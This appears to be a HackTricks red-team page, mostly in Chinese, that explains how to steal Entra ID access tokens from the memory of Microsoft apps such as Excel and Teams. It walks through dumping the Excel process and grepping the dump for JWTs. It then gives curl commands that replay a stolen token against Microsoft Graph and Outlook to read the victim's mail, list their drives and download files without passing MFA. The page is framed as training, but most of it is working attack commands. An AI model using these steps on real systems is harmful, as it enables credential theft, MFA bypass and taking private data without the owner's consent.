Az - Processes Memory Access Token

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

基本信息

此视频所述,一些与云同步的Microsoft软件(Excel、Teams等)可能在内存中以明文存储访问令牌。因此,仅仅转储进程的内存grep JWT令牌可能会让你绕过MFA访问受害者在云中的多个资源。

步骤:

  1. 使用你喜欢的工具转储与EntraID用户同步的Excel进程。

  2. 运行:string excel.dmp | grep 'eyJ0'并在输出中找到多个令牌

  3. 找到你最感兴趣的令牌并对其运行工具:

# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq

# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq

# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq

## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq

## Finally, download a file from that drive:
┌──(magichk㉿black-pearl)-[~]
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'

请注意,这种访问令牌也可以在其他进程中找到。

学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

Last updated